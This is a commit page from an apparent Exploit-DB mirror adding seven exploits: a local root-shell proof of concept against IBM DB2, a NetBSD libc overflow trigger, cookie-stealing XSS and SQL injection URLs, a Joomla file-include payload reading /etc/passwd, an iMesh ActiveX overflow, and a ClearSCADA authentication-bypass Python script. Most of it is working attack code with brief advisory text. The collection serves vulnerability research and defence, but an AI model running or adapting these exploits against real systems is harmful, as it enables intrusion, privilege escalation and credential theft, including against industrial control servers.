bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-01-29

Browse source 
7 new exploits
This commit is contained in:
Offensive Security 2015-01-29 08:36:27 +00:00
parent 40cfbfb905
commit e216d45120
8 changed files with 381 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

7
files.csv
View file

@ -32358,3 +32358,10 @@ id,file,description,date,author,platform,type,port
35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80
35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0
35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0
35918,platforms/multiple/remote/35918.c,"IBM DB2 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution Vulnerability",2011-06-30,"Tim Brown",multiple,remote,0
35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow Vulnerability",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-07-04,"Stefan Schurtz",php,webapps,0
35921,platforms/windows/remote/35921.html,"iMesh 10.0 'IMWebControl.dll' ActiveX Control Buffer Overflow Vulnerability",2011-07-04,KedAns-Dz,windows,remote,0
35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Include Vulnerability",2011-07-05,FL0RiX,php,webapps,0
35923,platforms/asp/webapps/35923.txt,"Paliz Portal Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-07-02,Net.Edit0r,asp,webapps,0
35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0

Can't render this file because it is too large.

9
platforms/asp/webapps/35923.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48559/info
Paliz Portal is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/Page.aspx?search=1[XSSCode]&mID=1641&Page=search/advancedsearch
http://www.example.com/News/shownews/[page].aspx?NewsId=[Sqli]
http://www.example.com/[Path]/Default.aspx?tabid=[Sqli]

29
platforms/bsd/remote/35919.c Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/48528/info
NetBSD is prone to a stack-based buffer-overflow vulnerability affecting multiple functions in the 'libc/net' library.
Successful exploits may allow an attacker to execute arbitrary code in the context of the application using the affected library. Failed exploit attempts will result in a denial-of-service condition.
/*
127# gcc -o grr grr.c && ./grr 6050
127# gcc -o grr grr.c && ./grr 6051
Memory fault (core dumped)
127#
*/
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
int main(int argc, char *argv[]){
char *cycek;
cycek=malloc(atoi(argv[1]));
if(!cycek) return 1;
memset(cycek,'A',atoi(argv[1]));
getservbyname(cycek,"tcp");
return 0;
}

69
platforms/multiple/remote/35918.c Executable file
View file

@ -0,0 +1,69 @@
source: http://www.securityfocus.com/bid/48514/info
IBM DB2 is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue to gain elevated privileges and execute arbitrary code with root privileges. Successfully exploiting this issue will result in a complete compromise of the affected system.
IBM DB2 9.7 is vulnerable; other versions may also be affected.
/*
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the Nth Dimension nor the names of its contributors may
be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
(c) Tim Brown, 2011
<mailto:timb@nth-dimension.org.uk>
<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
PoC exploit for IBM DB2 DT_RPATH privesc.
*/
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv) {
FILE *badlibkbbsrchandle;
int pwnedflag;
printf("PoC exploit for IBM DB2 DT_RPATH privesc.\r\n");
printf("(c) Tim Brown, 2011\r\n");
printf("<mailto:timb@nth-dimension.org.uk>\r\n");
printf("<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>\r\n");
printf("Constructing bad_libkbb.so...\r\n");
badlibkbbsrchandle = fopen("bad_libkbb.c", "w");
fprintf(badlibkbbsrchandle, "#include <stdio.h>\r\n");
fprintf(badlibkbbsrchandle, "#include <unistd.h>\r\n");
fprintf(badlibkbbsrchandle, "#include <stdlib.h>\r\n");
fprintf(badlibkbbsrchandle, "\r\n");
fprintf(badlibkbbsrchandle, "void __attribute__ ((constructor)) bad_libkbb(void) {\r\n");
fprintf(badlibkbbsrchandle, " printf(\"Have a root shell...\\r\\n\");\r\n");
fprintf(badlibkbbsrchandle, " setuid(geteuid());\r\n");
fprintf(badlibkbbsrchandle, " system(\"/usr/bin/id\");\r\n");
fprintf(badlibkbbsrchandle, " system(\"/bin/sh\");\r\n");
fprintf(badlibkbbsrchandle, " exit(0);\r\n");
fprintf(badlibkbbsrchandle, "}\r\n");
fclose(badlibkbbsrchandle);
system("gcc -shared -fPIC -o libkbb.so bad_libkbb.c");
system("/opt/ibm/db2/V9.7/itma/tmaitm6/lx8266/bin/kbbacf1");
exit(0);
}

25
platforms/php/webapps/35920.txt Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/48546/info
WebCalendar is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WebCalendar 1.2.3 is vulnerable; other versions may also be affected.
http://www.example.com/webapps/webcalendar/about/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/about/"><body onload=alert(&#039;XSS&#039;)>
http://www.example.com/webapps/webcalendar/datesel.php?form="><iframe onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/datesel.php?form=3&fday="><iframe onload=alert(document.cookie)>&fmonth=3&fyear=3&date=20110601
http://www.example.com/webapps/webcalendar/datesel.php?form=3&fday=3&fmonth="><iframe onload=alert(document.cookie)>&fyear=3&date=20110601
http://www.example.com/webapps/webcalendar/datesel.php?form=3&fday=3&fmonth=3&fyear="><iframe onload=alert(document.cookie)>&date=20110601
http://www.example.com/webapps/webcalendar/year.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/select_user.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/search_handler.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/datesel.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/edit_entry.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/search.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/help_edit_entry.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/catsel.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/help_index.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/help_docs.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/help_bug.php/"><body onload=alert(document.cookie)>

7
platforms/php/webapps/35922.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48558/info
The 'com_jr_tfb' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
http://www.example.com/index.php?option=com_jr_tfb&controller=../../../../../../../../etc/passwd%00

63
platforms/windows/remote/35921.html Executable file
View file

@ -0,0 +1,63 @@
source: http://www.securityfocus.com/bid/48550/info
iMesh is prone to a buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied data.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using an affected ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
iMesh 10.0 is vulnerable; other versions may also be affected.
<!--
###
# Title : iMesh <= 10.0 (IMWebControl.dll) Remote Buffer Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Remote Buffer Overflow & DLL Hijacked
##
# <3 Liyan Oz + All UE-Team & I.BackTrack Team <3
###
-->
<?XML version=&#039;1.0&#039; standalone=&#039;yes&#039; ?>
<package>
<job id=&#039;DoneInVBS&#039; debug=&#039;false&#039; error=&#039;true&#039;>
<object classid=&#039;clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B97&#039; id=&#039;target&#039;/>
<script language=&#039;vbscript&#039;>
&#039;Wscript.echo typename(target)
targetFile = "C:\Program Files\iMesh Applications\iMesh\IMWebControl.dll"
prototype = "ProcessRequestEx ( ByVal sourceName As String , ByVal destName As String , ByVal bFailIfExists As Long )"
memberName = "ProcessRequestEx"
progid = "target.IMWebControl"
buf=String(31337, "A") &#039; Buffer Overflow
puf=218959117 &#039;set ecx to 0x0d0d0d0d
target.SetHandler puf
target.ProcessRequestEx buf ,puf &#039; Bo0M !
</script>
</job>
</package>
<!--
#================[ Exploited By KedAns-Dz * Inj3ct0r * ]=========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > ++ Liyan Oz & Blackrootkit ..all
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r &#039;www.1337day.com/team&#039; ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# Jago-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================
-->

172
platforms/windows/remote/35924.py Executable file
View file

@ -0,0 +1,172 @@
#!/usr/bin/python
# cs-auby.py
# ClearSCADA Remote Authentication Bypass Exploit
#
# Jeremy Brown
# [jbrown3264/gmail]
#
# Oct 2010 (released Jan 2015)
#
# There is an authentication bypass vulnerability in ClearSCADA that can be
# exploited by triggering an exception in dbserver.exe and taking advantage
# of the way the program handles it.
#
# When an exception in occurs, ClearSCADA enters "Safe Mode". This exposes
# it's diagnostic functions to remote users without requiring a valid login
# as it would normally. A remote attacker could view senstive information
# and possibly modify functions of the server running on the affected host.
#
# This code triggers an exception in dbserver.exe and checks to see if you
# can then access the diagnostic page without authentication.
#
# Tested on ClearSCADA 2010R1 running on Windows
#
# Fix information: http://ics-cert.us-cert.gov/advisories/ICSA-11-173-01
#
import sys
import socket
import httplib
import urllib
from time import sleep
pkt_1=(
"\xfb\x0e\x45\x06\x0e\x00\x00\x00\x18\x00\x00\x00"
"\x49\x00\x50\x00\x20\x00\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00"
"\x2e\x00\x30\x00\x2e\x00\x31\x00\x2c\x00\x20\x00\x53\x00\x65\x00"
"\x73\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x20\x00\x30\x00\x00\x00"
"\x08\x00\x00\x00"
)
pkt_2=(
"\x00\x00\x00\x00"
"\x26\x00\x00\x00"
"\x08\x00\x00\x00\x0f\x00\x00\x00\x43\x00\x72\x00\x79\x00\x73\x00"
"\x74\x00\x61\x00\x6c\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00"
"\x74\x00\x73\x00\x00\x00"
)
pkt_3=( # "Exception Occured"
"\x00\x00\x00\x00\xd7\x01\x00\x00\x34\x00\x00\x00\x0d\x00\x00\x00"
"\x09\x00\x00\x00\x43\x00\x50\x00\x72\x00\x6f\x00\x66\x00\x69\x00"
"\x6c\x00\x65\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x46\x00\x6c\x00\x6f\x00"
"\x61\x00\x74\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x55\x00\x4c\x00\x6f\x00"
"\x6e\x00\x67\x00\x00\x00\x0d\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x4c\x00\x6f\x00\x6e\x00"
"\x67\x00\x00\x00\x10\x00\x00\x00\x43\x00\x41\x00\x64\x00\xBB\x00" # last w0rd
"\x00\x42\x00\x49\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
"\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41"
"\x00\x64\x00\x76\x00\x42\x00\x59\x00\x54\x00\x45\x00\x56\x00\x61"
"\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11"
"\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x57\x00\x4f\x00\x52"
"\x00\x44\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61"
"\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76"
"\x00\x44\x00\x49\x00\x4e\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75"
"\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x12\x00\x00\x00\x43"
"\x00\x41\x00\x64\x00\x76\x00\x55\x00\x44\x00\x49\x00\x4e\x00\x54"
"\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
"\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x52"
"\x00\x45\x00\x41\x00\x4c\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
"\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41"
"\x00\x64\x00\x76\x00\x44\x00\x4f\x00\x55\x00\x42\x00\x4c\x00\x45"
"\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
"\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x53"
"\x00\x74\x00\x72\x00\x69\x00\x6e\x00\x67\x00\x56\x00\x61\x00\x6c"
"\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x0f\x00\x00"
"\x00\x43\x00\x43\x00\x72\x00\x79\x00\x73\x00\x74\x00\x61\x00\x6c"
"\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00\x74\x00\x00\x00\x00"
)
port=5481
s_port=443
def do_ssl(target,port):
try:
conn = httplib.HTTPSConnection(target,port)
conn._http_vsn = 10
conn._http_vsn_str = "HTTP/1.0"
conn.request("GET","/diag/Info")
resp = conn.getresponse()
conn.close()
except Exception, error:
print("Error: %s" % error)
return None
return resp
def main():
if len(sys.argv)!=2:
print("Usage: %s <target>" % sys.argv[0])
sys.exit(0)
target=sys.argv[1]
cs=target,port
print "Checking server status..."
resp = do_ssl(target,s_port)
if(resp == None):
return
if(resp.status==301):
print "Server status is normal.\n"
elif(resp.status==200):
print "Server is already in safe mode."
sys.exit(1)
elif((resp.status!=301)|(resp.status!=200)):
print("Server returned %d %s, server state unknown.\nContinuing anyways..\n" % (resp.status,resp.reason))
print("Sending packets to trigger exception...\n")
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)
sock.send(pkt_1)
resp_1 = sock.recv(32)
sock.send(pkt_2)
resp_2 = sock.recv(32)
sock.send(pkt_3)
resp_3 = sock.recv(32)
sock.close()
except Exception, error:
print("Error: %s" % error)
return None
print("Finished, checking server status again...")
sleep(1)
resp = do_ssl(target,s_port)
if(resp == None):
return
if(resp.status==301):
print("Server status is still normal, maybe it's patched..\n")
elif(resp.status==200):
print("Server entered \"safe\" mode :)\n")
print("Surf on over to https://%s:443/diag/Info to explore" % target)
elif((resp.status!=301)|(resp.status!=200)):
print("Server returned %d %s, server state unknown." % (resp.status,resp.reason))
if __name__ == "__main__":
main()